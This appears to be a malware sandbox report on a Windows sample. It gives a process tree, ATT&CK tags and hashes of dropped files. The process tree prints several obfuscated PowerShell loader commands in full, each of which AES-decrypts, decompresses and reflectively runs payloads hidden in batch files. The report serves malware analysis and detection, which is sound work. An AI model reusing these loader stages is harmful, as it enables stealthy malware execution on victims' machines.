      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rvsrgv.cmd';$onXC='GdsIXetdsIXCudsIXrrdsIXedsIXntdsIXProdsIXcdsIXesdsIXsdsIX'.Replace('dsIX', ''),'ReYmpDaYmpDdYmpDLinYmpDeYmpDsYmpD'.Replace('YmpD', ''),'LocBSradcBSr'.Replace('cBSr', ''),'CUopChanUopCgeUopCExUopCtUopCeUopCnsUopCionUopC'.Replace('UopC', ''),'CopOqgKyTOqgKoOqgK'.Replace('OqgK', ''),'EzNzalemzNzaenzNzatAzNzatzNza'.Replace('zNza', ''),'TrYdddansYdddforYdddmFYdddiYdddnalYdddBlYdddockYddd'.Replace('Yddd', ''),'CrisAaeaisAatisAaeisAaDisAaecisAarypisAatoisAarisAa'.Replace('isAa', ''),'FCBzlromCBzlBaCBzlse6CBzl4StCBzlrinCBzlgCBzl'.Replace('CBzl', ''),'MafFGJinMfFGJofFGJdufFGJlefFGJ'.Replace('fFGJ', ''),'SplmjJgimjJgtmjJg'.Replace('mjJg', ''),'IJmqCnJmqCvJmqCoJmqCkeJmqC'.Replace('JmqC', ''),'DeciWWUomiWWUpiWWUreiWWUssiWWU'.Replace('iWWU', ''),'EnoYhltryoYhlPooYhlioYhlnoYhltoYhl'.Replace('oYhl', '');powershell -w hidden;function KGBcO($oTSGR){$eUncv=[System.Security.Cryptography.Aes]::Create();$eUncv.Mode=[System.Security.Cryptography.CipherMode]::CBC;$eUncv.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$eUncv.Key=[System.Convert]::($onXC[8])('pNjGI3IZKAxg5HRDj0MOJKwKxWLd9euJ8G+gcV8MTQM=');$eUncv.IV=[System.Convert]::($onXC[8])('FeUFzD6r6bJrmz9Sm3q9Nw==');$HeQya=$eUncv.($onXC[7])();$EFMlu=$HeQya.($onXC[6])($oTSGR,0,$oTSGR.Length);$HeQya.Dispose();$eUncv.Dispose();$EFMlu;}function Flypp($oTSGR){$MyxHk=New-Object System.IO.MemoryStream(,$oTSGR);$ZymUr=New-Object System.IO.MemoryStream;$AkibE=New-Object System.IO.Compression.GZipStream($MyxHk,[IO.Compression.CompressionMode]::($onXC[12]));$AkibE.($onXC[4])($ZymUr);$AkibE.Dispose();$MyxHk.Dispose();$ZymUr.Dispose();$ZymUr.ToArray();}$YspHZ=[System.IO.File]::($onXC[1])([Console]::Title);$PEhca=Flypp (KGBcO ([Convert]::($onXC[8])([System.Linq.Enumerable]::($onXC[5])($YspHZ, 5).Substring(2))));$nQISs=Flypp (KGBcO ([Convert]::($onXC[8])([System.Linq.Enumerable]::($onXC[5])($YspHZ, 6).Substring(2))));[System.Reflection.Assembly]::($onXC[2])([byte[]]$nQISs).($onXC[13]).($onXC[11])($null,$null);[System.Reflection.Assembly]::($onXC[2])([byte[]]$PEhca).($onXC[13]).($onXC[11])($null,$null); "
      4⤵
      PID:4556
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bmdzuh.cmd" "
  2⤵
  PID:1068
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:2216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\bmdzuh.cmd"
    3⤵
    PID:3808
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:2768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\bmdzuh.cmd';$PHNy='CopLDfIyTLDfIoLDfI'.Replace('LDfI', ''),'SpgTFHligTFHtgTFH'.Replace('gTFH', ''),'ElmGCzemmGCzenmGCztAmGCztmGCz'.Replace('mGCz', ''),'IIhIAnIhIAvoIhIAkeIhIA'.Replace('IhIA', ''),'TraMYwKnsfMYwKoMYwKrmMYwKFMYwKiMYwKnMYwKalBMYwKlMYwKoMYwKckMYwK'.Replace('MYwK', ''),'RclyZeadclyZLiclyZneclyZsclyZ'.Replace('clyZ', ''),'EnIJlVtryIJlVPoIJlVinIJlVtIJlV'.Replace('IJlV', ''),'DeUCclcoUCclmprUCclesUCclsUCcl'.Replace('UCcl', ''),'LomeIPadmeIP'.Replace('meIP', ''),'CrpbCReatpbCReDepbCRcpbCRrypbCRptpbCRorpbCR'.Replace('pbCR', ''),'MaokPZiokPZnMookPZdokPZulokPZeokPZ'.Replace('okPZ', ''),'FrqnaJoqnaJmBqnaJaseqnaJ6qnaJ4qnaJSqnaJtqnaJrinqnaJgqnaJ'.Replace('qnaJ', ''),'CetzchaetzcnetzcgetzceEetzcxtetzcensetzcioetzcnetzc'.Replace('etzc', ''),'GeNQYFtCNQYFuNQYFrrNQYFenNQYFtPNQYFrocNQYFeNQYFssNQYF'.Replace('NQYF', '');powershell -w hidden;function pDetK($fOpAs){$bgXDX=[System.Security.Cryptography.Aes]::Create();$bgXDX.Mode=[System.Security.Cryptography.CipherMode]::CBC;$bgXDX.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$bgXDX.Key=[System.Convert]::($PHNy[11])('bxF/TPCrnqS8oKnt4vScjzAsE4RJwU9wHt4e08G/m44=');$bgXDX.IV=[System.Convert]::($PHNy[11])('7suXI0+vVftF+fD5TxfHPg==');$hxxSG=$bgXDX.($PHNy[9])();$WjYCL=$hxxSG.($PHNy[4])($fOpAs,0,$fOpAs.Length);$hxxSG.Dispose();$bgXDX.Dispose();$WjYCL;}function ekEym($fOpAs){$nHHGN=New-Object System.IO.MemoryStream(,$fOpAs);$UlcMg=New-Object System.IO.MemoryStream;$iTxNa=New-Object System.IO.Compression.GZipStream($nHHGN,[IO.Compression.CompressionMode]::($PHNy[7]));$iTxNa.($PHNy[0])($UlcMg);$iTxNa.Dispose();$nHHGN.Dispose();$UlcMg.Dispose();$UlcMg.ToArray();}$fZCvx=[System.IO.File]::($PHNy[5])([Console]::Title);$mUlzy=ekEym (pDetK ([Convert]::($PHNy[11])([System.Linq.Enumerable]::($PHNy[2])($fZCvx, 5).Substring(2))));$UNRXF=ekEym (pDetK ([Convert]::($PHNy[11])([System.Linq.Enumerable]::($PHNy[2])($fZCvx, 6).Substring(2))));[System.Reflection.Assembly]::($PHNy[8])([byte[]]$UNRXF).($PHNy[6]).($PHNy[3])($null,$null);[System.Reflection.Assembly]::($PHNy[8])([byte[]]$mUlzy).($PHNy[6]).($PHNy[3])($null,$null); "
      4⤵
      PID:4212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\whofyb.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3852
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\whofyb.cmd"
    3⤵
    PID:3848
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:1960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\whofyb.cmd';$rBtJ='TrkQKYankQKYsfokQKYrmkQKYFikQKYnakQKYlBkQKYlokQKYckkQKY'.Replace('kQKY', ''),'GebwYstCubwYsrrbwYsebwYsntbwYsPbwYsrobwYscebwYsssbwYs'.Replace('bwYs', ''),'LncxHoancxHdncxH'.Replace('ncxH', ''),'InNqXjvoNqXjkeNqXj'.Replace('NqXj', ''),'EnadsZtadsZryadsZPadsZoiadsZntadsZ'.Replace('adsZ', ''),'SpKdNtliKdNttKdNt'.Replace('KdNt', ''),'CeltOoeltOpyTeltOoeltO'.Replace('eltO', ''),'CrPUmAePUmAatePUmADPUmAecrPUmAyptPUmAoPUmArPUmA'.Replace('PUmA', ''),'FVMAIroVMAImVMAIBVMAIaVMAIsVMAIeVMAI64SVMAItrVMAIinVMAIgVMAI'.Replace('VMAI', ''),'DecaZvLomaZvLpraZvLessaZvL'.Replace('aZvL', ''),'ROvpmeaOvpmdLiOvpmneOvpmsOvpm'.Replace('Ovpm', ''),'CAWXWhaAWXWngAWXWeEAWXWxtAWXWeAWXWnsiAWXWonAWXW'.Replace('AWXW', ''),'ETBPwleTBPwmenTBPwtATBPwtTBPw'.Replace('TBPw', ''),'MajizAijizAnMjizAodjizAuljizAejizA'.Replace('jizA', '');powershell -w hidden;function IYiuD($wjsUF){$kMsjz=[System.Security.Cryptography.Aes]::Create();$kMsjz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$kMsjz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$kMsjz.Key=[System.Convert]::($rBtJ[8])('UB53lVyfvWkmj8Voym30Pc50SmA5H6jc2lsEEupoGH8=');$kMsjz.IV=[System.Convert]::($rBtJ[8])('fUxLkppjwW7SQzej3OvgiQ==');$rzjVt=$kMsjz.($rBtJ[7])();$znDXa=$rzjVt.($rBtJ[0])($wjsUF,0,$wjsUF.Length);$rzjVt.Dispose();$kMsjz.Dispose();$znDXa;}function kSEaL($wjsUF){$Ujsue=New-Object System.IO.MemoryStream(,$wjsUF);$WoHaN=New-Object System.IO.MemoryStream;$hzzYE=New-Object System.IO.Compression.GZipStream($Ujsue,[IO.Compression.CompressionMode]::($rBtJ[9]));$hzzYE.($rBtJ[6])($WoHaN);$hzzYE.Dispose();$Ujsue.Dispose();$WoHaN.Dispose();$WoHaN.ToArray();}$XsYgk=[System.IO.File]::($rBtJ[10])([Console]::Title);$sRDam=kSEaL (IYiuD ([Convert]::($rBtJ[8])([System.Linq.Enumerable]::($rBtJ[12])($XsYgk, 5).Substring(2))));$qEhNb=kSEaL (IYiuD ([Convert]::($rBtJ[8])([System.Linq.Enumerable]::($rBtJ[12])($XsYgk, 6).Substring(2))));[System.Reflection.Assembly]::($rBtJ[2])([byte[]]$qEhNb).($rBtJ[4]).($rBtJ[3])($null,$null);[System.Reflection.Assembly]::($rBtJ[2])([byte[]]$sRDam).($rBtJ[4]).($rBtJ[3])($null,$null); "
      4⤵
      PID:212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mfimus.cmd" "
  2⤵
  PID:168
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\mfimus.cmd"
    3⤵
    PID:1352
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:1796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\mfimus.cmd';$aPtB='GeWXrStCWXrSuWXrSrreWXrSntWXrSPrWXrSoceWXrSsWXrSsWXrS'.Replace('WXrS', ''),'RfDFeeafDFedLifDFenefDFesfDFe'.Replace('fDFe', ''),'FrOLOhomBOLOhasOLOheOLOh6OLOh4OLOhSOLOhtrOLOhingOLOh'.Replace('OLOh', ''),'TVRuMraVRuMnsVRuMfoVRuMrVRuMmVRuMFinVRuMaVRuMlBVRuMlocVRuMkVRuM'.Replace('VRuM', ''),'ElelNWRmenlNWRtAtlNWR'.Replace('lNWR', ''),'DeqctFcqctFomqctFpreqctFssqctF'.Replace('qctF', ''),'SBotBplBotBitBotB'.Replace('BotB', ''),'MaRqGUinRqGUModRqGUuleRqGU'.Replace('RqGU', ''),'EfAzgnfAzgtfAzgryfAzgPfAzgofAzginfAzgtfAzg'.Replace('fAzg', ''),'LngmCoangmCdngmC'.Replace('ngmC', ''),'IhYyDnhYyDvohYyDkhYyDehYyD'.Replace('hYyD', ''),'CPsobhPsobangPsobeExPsobtePsobnPsobsPsobioPsobnPsob'.Replace('Psob', ''),'CrnqJueatnqJuenqJuDenqJucnqJurynqJuptnqJuonqJurnqJu'.Replace('nqJu', ''),'CopghBlyghBlToghBl'.Replace('ghBl', '');powershell -w hidden;function abPQa($IfXUW){$HJskE=[System.Security.Cryptography.Aes]::Create();$HJskE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HJskE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$HJskE.Key=[System.Convert]::($aPtB[2])('wkuHOdFvqMJwAh4uKqVCUQ+vzbJB3aI/YNbObo4wTL8=');$HJskE.IV=[System.Convert]::($aPtB[2])('joMfgWogIU9zEe7ZABnGIA==');$FVoig=$HJskE.($aPtB[12])();$lLewJ=$FVoig.($aPtB[3])($IfXUW,0,$IfXUW.Length);$FVoig.Dispose();$HJskE.Dispose();$lLewJ;}function rMfXy($IfXUW){$aOOyO=New-Object System.IO.MemoryStream(,$IfXUW);$FHJnA=New-Object System.IO.MemoryStream;$Advsi=New-Object System.IO.Compression.GZipStream($aOOyO,[IO.Compression.CompressionMode]::($aPtB[5]));$Advsi.($aPtB[13])($FHJnA);$Advsi.Dispose();$aOOyO.Dispose();$FHJnA.Dispose();$FHJnA.ToArray();}$XiwcQ=[System.IO.File]::($aPtB[1])([Console]::Title);$TqVAL=rMfXy (abPQa ([Convert]::($aPtB[2])([System.Linq.Enumerable]::($aPtB[4])($XiwcQ, 5).Substring(2))));$lpFEC=rMfXy (abPQa ([Convert]::($aPtB[2])([System.Linq.Enumerable]::($aPtB[4])($XiwcQ, 6).Substring(2))));[System.Reflection.Assembly]::($aPtB[9])([byte[]]$lpFEC).($aPtB[8]).($aPtB[10])($null,$null);[System.Reflection.Assembly]::($aPtB[9])([byte[]]$TqVAL).($aPtB[8]).($aPtB[10])($null,$null); "
      4⤵
      PID:5492
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      PID:5560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ujlsid.cmd" "
  2⤵
  PID:5072
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ujlsid.cmd"
    3⤵
    PID:2180
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:4148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\ujlsid.cmd';$YPBU='EleaZEGmeaZEGntaZEGAtaZEG'.Replace('aZEG', ''),'ChDHjkangDHjkeEDHjkxtDHjkenDHjksioDHjknDHjk'.Replace('DHjk', ''),'GejdLitCjdLiurjdLirenjdLitPjdLirocjdLiessjdLi'.Replace('jdLi', ''),'FLLomroLLommBaLLomseLLom6LLom4StLLomrinLLomgLLom'.Replace('LLom', ''),'CYGUrreaYGUrtYGUreDeYGUrcrYGUrypYGUrtoYGUrrYGUr'.Replace('YGUr', ''),'RedkLcadLdkLcidkLcndkLcesdkLc'.Replace('dkLc', ''),'IndfVfvokdfVfedfVf'.Replace('dfVf', ''),'DegMlecgMleomgMlepgMleregMlesgMlesgMle'.Replace('gMle', ''),'CoEWVTpyEWVTTEWVToEWVT'.Replace('EWVT', ''),'LoaSQDrdSQDr'.Replace('SQDr', ''),'TiYEpraiYEpnsiYEpfoiYEpriYEpmiYEpFiiYEpnaliYEpBiYEpliYEpockiYEp'.Replace('iYEp', ''),'ElGblnlGbltrylGblPolGblinlGbltlGbl'.Replace('lGbl', ''),'SpkElplpkElitpkEl'.Replace('pkEl', ''),'MaZDrVinZDrVMoZDrVdulZDrVeZDrV'.Replace('ZDrV', '');powershell -w hidden;function fVngl($ftwid){$EVbur=[System.Security.Cryptography.Aes]::Create();$EVbur.Mode=[System.Security.Cryptography.CipherMode]::CBC;$EVbur.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$EVbur.Key=[System.Convert]::($YPBU[3])('Ieo2MG7H99k7aLD+jBkloUuNzBmDXfQew09jtuwn4wg=');$EVbur.IV=[System.Convert]::($YPBU[3])('m1YrH3q6hP9y8uolVVFp4A==');$rJkFH=$EVbur.($YPBU[4])();$jwqrU=$rJkFH.($YPBU[10])($ftwid,0,$ftwid.Length);$rJkFH.Dispose();$EVbur.Dispose();$jwqrU;}function WOuJR($ftwid){$xASKc=New-Object System.IO.MemoryStream(,$ftwid);$zxcPp=New-Object System.IO.MemoryStream;$JFiXN=New-Object System.IO.Compression.GZipStream($xASKc,[IO.Compression.CompressionMode]::($YPBU[7]));$JFiXN.($YPBU[8])($zxcPp);$JFiXN.Dispose();$xASKc.Dispose();$zxcPp.Dispose();$zxcPp.ToArray();}$BpGAz=[System.IO.File]::($YPBU[5])([Console]::Title);$qKYig=WOuJR (fVngl ([Convert]::($YPBU[3])([System.Linq.Enumerable]::($YPBU[0])($BpGAz, 5).Substring(2))));$PEUAW=WOuJR (fVngl ([Convert]::($YPBU[3])([System.Linq.Enumerable]::($YPBU[0])($BpGAz, 6).Substring(2))));[System.Reflection.Assembly]::($YPBU[9])([byte[]]$PEUAW).($YPBU[11]).($YPBU[6])($null,$null);[System.Reflection.Assembly]::($YPBU[9])([byte[]]$qKYig).($YPBU[11]).($YPBU[6])($null,$null); "
      4⤵
      PID:1764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      PID:380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\brdgpn.cmd" "
  2⤵
  PID:4020
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:64
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rfpoyr.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4148
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\rfpoyr.cmd"
    3⤵
    PID:216
  - - C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      4⤵
      PID:3480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rfpoyr.cmd';$vtQY='MaibDRNnbDRNMbDRNodbDRNulbDRNebDRN'.Replace('bDRN', ''),'EnKWhltrKWhlyPoKWhlinKWhltKWhl'.Replace('KWhl', ''),'LNuQBoadNuQB'.Replace('NuQB', ''),'GetRHYyCuRHYyrrRHYyenRHYytRHYyPrRHYyocRHYyeRHYyssRHYy'.Replace('RHYy', ''),'TrauaQanuaQasfuaQaormuaQaFiuaQanaluaQaBluaQaocuaQakuaQa'.Replace('uaQa', ''),'CJQokopJQokyToJQok'.Replace('JQok', ''),'CmwHhhmwHhanmwHhgemwHhExtmwHhenmwHhsimwHhomwHhnmwHh'.Replace('mwHh', ''),'IbscEnbscEvobscEkebscE'.Replace('bscE', ''),'ElejEJGmjEJGejEJGntjEJGAtjEJG'.Replace('jEJG', ''),'DecgnNeompgnNeregnNesgnNesgnNe'.Replace('gnNe', ''),'CrRUbneRUbnateRUbnDeRUbncryRUbnptRUbnorRUbn'.Replace('RUbn', ''),'SvVqZpvVqZlitvVqZ'.Replace('vVqZ', ''),'ReaMEEXdMEEXLiMEEXnMEEXesMEEX'.Replace('MEEX', ''),'FXqXfromXqXfBaXqXfse6XqXf4StXqXfriXqXfngXqXf'.Replace('XqXf', '');powershell -w hidden;function Ewtlb($abWoa){$gSZqA=[System.Security.Cryptography.Aes]::Create();$gSZqA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$gSZqA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$gSZqA.Key=[System.Convert]::($vtQY[13])('YLfZwIIw4D86H/5RzF5OrZ6L89xwgWpz+rr30s9UJyo=');$gSZqA.IV=[System.Convert]::($vtQY[13])('u1stytyZQ5Itz3q+qt3Uqw==');$TcKlV=$gSZqA.($vtQY[10])();$lMjqd=$TcKlV.($vtQY[4])($abWoa,0,$abWoa.Length);$TcKlV.Dispose();$gSZqA.Dispose();$lMjqd;}function qKXOs($abWoa){$FKmjP=New-Object System.IO.MemoryStream(,$abWoa);$EAHLm=New-Object System.IO.MemoryStream;$Zxmbx=New-Object System.IO.Compression.GZipStream($FKmjP,[IO.Compression.CompressionMode]::($vtQY[9]));$Zxmbx.($vtQY[5])($EAHLm);$Zxmbx.Dispose();$FKmjP.Dispose();$EAHLm.Dispose();$EAHLm.ToArray();}$fNWGU=[System.IO.File]::($vtQY[12])([Console]::Title);$BXLeI=qKXOs (Ewtlb ([Convert]::($vtQY[13])([System.Linq.Enumerable]::($vtQY[8])($fNWGU, 5).Substring(2))));$AbfHK=qKXOs (Ewtlb ([Convert]::($vtQY[13])([System.Linq.Enumerable]::($vtQY[8])($fNWGU, 6).Substring(2))));[System.Reflection.Assembly]::($vtQY[2])([byte[]]$AbfHK).($vtQY[1]).($vtQY[7])($null,$null);[System.Reflection.Assembly]::($vtQY[2])([byte[]]$BXLeI).($vtQY[1]).($vtQY[7])($null,$null); "
      4⤵
      PID:2276
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc

SHA1
75c07243f9cb80a9c7aed2865f9c5192cc920e7e

SHA256
91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

SHA512
db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
edb6e16bbdf430721aa30cb9883cf64e

SHA1
e65915a5a3c9cfe1831ff9889db35ad636c3f520

SHA256
79371ac80bd42179439accfde2b747a750ee8ff044a1761593604144e67c3f97

SHA512
8ab5a15d2656d73c99a49ba7ed07601402b81318728fb1bb736bc2d8ee274cfc86ecc88a839c53e8109a06594ef4cb2c16d97c4f7c7d53758b957b8f24120046

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gd5f2udp.2mg.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\bmdzuh.cmd

Filesize
623KB

MD5
39ffb6d71d850926d61b85df8ec39216

SHA1
8e6ff551afb63198515c098acc95e78d3bdb4785

SHA256
5ef98490547ed6cc8dfebc2fef6bd8f524a58db18b554de7dea3b856b932f860

SHA512
dbe5cc6e20d98aadf2f9f5ba0d727d7c14f7a9d3993cda12975ddb5a2e34a08c1233ca7c7a4ff524020a05cd22b65fa3e1b2b4fa3a9bad7377c962b7bda0de8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\brdgpn.cmd

Filesize
399KB

MD5
06b9bd2493080cfba136ae641332d93b

SHA1
5ccda49386b0abf64a74639abb82d4d9797b8007

SHA256
6c36f68467619f4707a460c7d82a514831c02f4959fff75046a224f389bbb4f2

SHA512
d90c44ec470082b6a493f46b91ae62cb2c46f8586f1a88fa0e5465c758ef7f03fedb6ff27277a54620bd6af313a22ae3d6b3dae0c149c0777bfae8a516c7f145

Download Submit
C:\Users\Admin\AppData\Local\Temp\dxafki.cmd

Filesize
3.1MB

MD5
f95dfe17a283dbb9301936821032b9a4

SHA1
357edc773d07784e7fd295c2b273305994789fc4

SHA256
22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c

SHA512
2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8

Download Submit
C:\Users\Admin\AppData\Local\Temp\dxaktb.bat

Filesize
3.4MB

MD5
b73dc1ad88598d67c62f694c382be267

SHA1
7a5574b1e22e860e71c47104a588cfbcc78f9a63

SHA256
6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687

SHA512
d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675

Download Submit
C:\Users\Admin\AppData\Local\Temp\fmmifi.bat

Filesize
2.8MB

MD5
a27d0d05a470dc95f1c74c7861761e9f

SHA1
c4533a4822975c7a6316e375e365df82676dce76

SHA256
3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7

SHA512
7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f

Download Submit
C:\Users\Admin\AppData\Local\Temp\mfhhij.cmd

Filesize
148KB

MD5
6499da1cbdec12e9bd760be0b40e5a20

SHA1
cea29c70945d4afdc3b962a5269473353289f330

SHA256
700d2382750464a339e5937706a609d6107cafd62dc4e094fe56b42e102655b1

SHA512
c95502e2a24a3e40a5d63ec1f826f42e8516536c3b739bf9cc2e33403e3cae025420c97055a43f6c475d1a119c1124b0ad6910843b30c7cc091c1b2861567922

Download Submit
C:\Users\Admin\AppData\Local\Temp\mfimus.cmd

Filesize
410KB

MD5
0c6afb98c3b63a6fcc432dce36ea51b3

SHA1
13f5656edf6789205461704d34cd94575b5e5c2e

SHA256
54bf31b50a2f0f34b8ca04231e1383433a7cc2d216eeb47defbef124515cd3b4

SHA512
1254e5a64f6448bc2f4fe4ad537941dd69100b7b578079eb0f7cce170f926387a4ea93b5e979fe8da9d61445a7148c91a61da9f5b5cc8c575ae9e2b895166df1

Download Submit
C:\Users\Admin\AppData\Local\Temp\nmnulh.cmd

Filesize
165KB

MD5
ee7cdd471dc151b1f8aaf39e614555db

SHA1
c52229141e729a5dac15cbbb65b8d65519e42f84

SHA256
8f45dabf00eeedc88eda8debf0a090643a763a6b2c2f51dc6b40c2c00f46d3e7

SHA512
c323a7cac29f141389b2a5d2b9ed77975633c4fe73f7fd00cc3de239688a0a7972f9719939ba348a7ac5bcd19b24c2b9262c4660c5f5ea692e66b20a1a9ff240

Download Submit
C:\Users\Admin\AppData\Local\Temp\pxovyw.cmd

Filesize
704KB

MD5
7bd12d34394e92806e7e4c1673b93b9a

SHA1
8b1267a1d6a2da9793ff30e82d2c5d2cbe96d3cd

SHA256
c112ae5904e798fe3f5f7200dbd33d67f0e32b3504e3bb45f255c36a0cc69d4d

SHA512
2b307f6fe75bcf7bbe0d9fa870432e385f1320b6ebaeae481acee07130b4610fbda976db097dfeb882242ad9d6ad55cfd88854150410fc1b3e30bb224937488e

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfpoyr.cmd

Filesize
399KB

MD5
dd90d8cfbda887f8bba21fa78b2b6701

SHA1
f79dbdb0d702a7ae5fcac913681bb4371aff7434

SHA256
82e6279ceddc899e1d28d121ae181f1710b3961950d2a332854ac3335c68a4c8

SHA512
5b620e39d6fa5a4d8c4938c1ee960ac65e8a7f84ff7b2b0a0a2f65a4bd8baf5d93c06b97248dff9ab48714792df08d19195d746d4b8847dc8811e093e90d0c0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\rvsrgv.cmd

Filesize
470KB

MD5
6acc2c77b4172502ec389c60eb9a0de5

SHA1
775a9ae16ad6fb3b81c3575889353bbbb76457da

SHA256
6db7f6651be101939dfaacfc6fcc4032224393a36139eb84e86e11ddcae6d84e

SHA512
ca2a260bb078b9a0eaf94344514bfb60d9fe33ccd8f6b89425cdf6e61b26ba6f5dbfb963c53ad7c0cb493f0a9a4a4517cdc41560d798a9749d7bc0464ebd9c01

Download Submit
